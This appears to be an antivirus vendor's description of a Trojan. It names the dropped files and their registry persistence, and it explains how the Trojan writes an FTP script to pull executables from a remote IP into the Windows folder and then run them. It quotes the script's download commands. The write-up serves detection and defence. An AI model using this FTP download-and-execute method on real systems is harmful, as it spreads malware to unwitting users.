This Trojan downloads components that deliver porn to the compromised system. The related files installed are
logon.exe - 69,632 bytes
abox.exe - 36,864 bytes
These files are commonly installed to the Windows folder, and may load via the system registry from the common RUN location.
When the Trojan is first run, it connects with an IP address 18.104.22.168 using the system's own file transfer utility called FTP.EXE. The Trojan first writes an FTP script file into the TEMP folder named "Abox.ftp" and then runs FTP passing the script as a parameter. The script instructs FTP to retrieve files by their remote name and copy them to the Windows folder -
get ABox.exe C:\WINNT\ABox.exe
get logon.exe C:\WINNT\logon.exe
get ABox.bup C:\WINNT\ABox.bup
The Windows folder name is determined before the FTP script is created. After all files are retrieved, both executables are run. The file "ABox.bup" contains update information for the Trojan.
The file "abox.exe" is referenced as "Fun Box" by the author.
- check the main screen using the web interface to
ensure the latest AV/NIDS database has been downloaded
and installed -- if required, enable the "Allow
Push Update" option